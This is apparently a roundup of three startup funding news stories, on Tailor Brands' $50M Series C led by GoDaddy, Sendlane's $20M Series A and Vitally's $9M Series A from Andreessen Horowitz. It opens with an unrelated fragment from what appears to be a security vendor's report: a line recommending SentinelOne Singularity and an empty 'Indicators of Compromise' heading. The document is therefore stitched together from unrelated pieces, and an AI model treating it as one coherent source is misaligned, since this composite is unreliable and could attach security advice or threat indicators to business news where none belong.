Users should run an up-to-date security solution such as SentinelOne Singularity across their environment and review security alerts.

Indicators of Compromise




Tailor Brands raises $50M, aims to be one-stop shop for small businesses to launch

Tailor Brands, a startup that automates parts of the branding and marketing process for small businesses, announced Thursday it has raised $50 million in Series C funding.

GoDaddy led the round as a strategic partner and was joined by OurCrowd and existing investors Pitango Growth, Mangrove Capital Partners, Armat Group, Disruptive VC and Whip Media founder Richard Rosenblatt. Tailor Brands has now raised a total of $70 million since its inception in 2015.

“GoDaddy is empowering everyday entrepreneurs around the world by providing all of the help and tools to succeed online,” said Andrew Morbitzer, vice president of corporate development at GoDaddy, in a written statement. “We are excited to invest in Tailor Brands — and its team — as we believe in their vision. Their platform truly helps entrepreneurs start their business quickly and easily with AI-powered logo design and branding services.”

When Tailor Brands, which launched at TechCrunch’s Startup Battlefield in 2014, raised its last round, a $15.5 million Series B, in 2018, the company was focused on AI-driven logo creation.

The company, headquartered in New York and Tel Aviv, is now compiling the components for a one-stop SaaS platform — providing the design, branding and marketing services a small business owner needs to launch and scale operations, and within minutes, Yali Saar, co-founder and CEO of Tailor Brands told TechCrunch.

Over the past year, more users are flocking to Tailor Brands; the company is onboarding some 700,000 new users per month for help in the earliest stages of setting up their business. In fact, the company saw a 27% increase in new business incorporations as the creator and gig economy gained traction in 2020, Saar said.

In addition to the scores of new users, the company crossed 30 million businesses using the platform. At the end of 2019, Tailor Brands started monetizing its offerings and “grew at a staggering rate,” Saar added. The company yielded triple-digit annual growth in revenue.

To support that growth, the new funding will be used on R&D, to double the team and create additional capabilities and functions. There may also be future acquisition opportunities on the table.

Saar said Tailor Brands is at a point where it can begin leveraging the massive amount of data on small businesses it gathers to help them be proactive rather than reactive, turning the platform into a “consultant of sorts” to guide customers through the next steps of their businesses.

“Users are looking for us to provide them with everything, so we are starting to incorporate more products with the goal of creating an ecosystem, like WeChat, where you don’t need to leave the platform at all to manage your business,” Saar said.

 

Sendlane raises $20M to convert shoppers into loyal customers

Sendlane, a San Diego-based multichannel marketing automation platform, announced Thursday it raised $20 million in Series A funding.

Five Elms Capital and others invested in the round to give Sendlane total funding of $23 million since the company was founded in 2018.

Though the company officially started three years ago, co-founder and CEO Jimmy Kim told TechCrunch he began working on the idea back in 2013 with two other co-founders.

They were all email marketers in different lines of business, but had some common ground in that they were all using email tools they didn’t like. The ones they did like came with too big of a price tag for a small business, Kim said. They set out to build their own email marketing automation platform for customers that wanted to do more than email campaigns and newsletters.

When two other companies Kim was involved in exited in 2017, he decided to put both feet into Sendlane to build it into a system that maximized revenue based on insights and integrations.

In late 2018, the company attracted seed funding from Zing Capital and decided in 2019 to pivot into e-commerce. “Based on our personal backgrounds and looking at the customers we worked with, we realized that is what we did best,” Kim said.

Today, more than 1,700 e-commerce companies use Sendlane’s platform to convert more than 100 points of their customers’ data — abandoned carts, which products sell the best and which marketing channel is working — into engaging communications aimed at driving customer loyalty. The company said it can increase revenue for customers between 20% and 40% on average.

The company itself is growing 100% year over year and seeing over $7 million in annual recurring revenue. It currently has 54 employees right now, and Kim expects to be at around 90 by the end of the year and 150 by the end of 2022. Sendlane currently has more than 20 open roles, he said.

That current and potential growth was a driver for Kim to go after the Series A funding. He said Sendlane became profitable last year, which is why it has not raised a lot of money so far. However, as the rapid adoption of e-commerce continues, Kim wants to be ready for the next wave of competition coming in, which he expects in the next year.

He considers companies like ActiveCampaign and Klaviyo to be in line with Sendlane, but says his company’s differentiator is customer service, boasting short wait times and chats that answer questions in less than 15 seconds.

He is also ready to go after the next vision, which is to unify data and insights to create meaningful interactions between customers and retailers.

“We want to start carving out a new space,” Kim added. “We have a ton of new products coming out in the next 12 to 18 months and want to be the single source for customer journey data insights that provides flexibility for your business to grow.”

Two upcoming tools include Audiences, which will unify customer data and provide insights, and an SMS product for two-way communications and enabled campaign-level sending.

 

Andreessen Horowitz funds Vitally’s $9M round for customer experience software

Customer success company Vitally raised $9 million in Series A funding from Andreessen Horowitz to continue developing its SaaS platform automating customer experiences.

Co-founder and CEO Jamie Davidson got the idea for Vitally while he was at his previous company, Pathgather. As chief customer officer, he was looking at tools and “was underwhelmed” by the available tools to automate repetitive tasks. So he set out to build one.

The global pandemic thrust customer satisfaction into the limelight as brands realized that the same ways they were engaging with customers had to change now that everyone was making the majority of their purchases online. Previously, a customer service representative may have managed a dozen accounts, but nowadays with product-led growth, they tackle a portfolio of thousands of customers, Davidson told TechCrunch.

New York-based Vitally, founded in 2017, unifies all of that customer data into one place and flows it through an engine to provide engagement insights, like what help customers need, which ones are at risk of churning and which to target for expanded revenue opportunities. Its software also provides automation to balance workflow and steer customer success teams to the tasks with the right customers so that they are engaging at the correct time.

Andreessen approached Davidson for the Series A, and he liked the alignment in customer success vision, he said. Including the new funding, Vitally raised a total of $10.6 million, which includes $1.2 million in September 2019.

From the beginning, Vitally was bringing in strong revenue growth, which enabled the company to focus on building its platform and hold off on fundraising.

“A Series A was certainly on our mind and road map, but we weren’t actively fundraising,” Davidson said. “However, we saw a great fit and great backing to help us grow. Tools have lagged in the customer success area and how to manage that. Andreessen can help us scale and grow with our customers as they manage the thousands of their customers.”

Davidson intends to use the new funding to scale Vitally’s team across the board and build out its marketing efforts to introduce the company to the market. He expects to grow to 30 by the end of the year to support the company’s annual revenue growth — averaging 3x — and customer acquisition. Vitally is already working with big customers like Segment, Productboard and Calendly.

As part of the investment, Andreessen general partner David Ulevitch is joining the Vitally board. He saw an opportunity for the reimagining of how SaaS companies delivered customer success, he told TechCrunch via email.

Similar to Davidson, he thought that customer success teams were now instrumental to growing SaaS businesses, but technology lagged behind market need, especially with so many SaaS companies taking a self-serve or product-led approach that attracted more orders than legacy tools.

Before the firm met Vitally, it was hearing “rave reviews” from its customers, Ulevitch said.

“The feedback was overwhelmingly positive and affirmed the fact that Vitally simply had the best product on the market since it actually mapped to how businesses operated and interacted with customers, particularly businesses with a long-tail of paying customers,” he added. “The first dollar into a SaaS company is great, but it’s the renewal and expansion dollars that really set the winners apart from everyone else. Vitally is in the best position to help companies get that renewal, help their customers expand accounts and ultimately win the space.”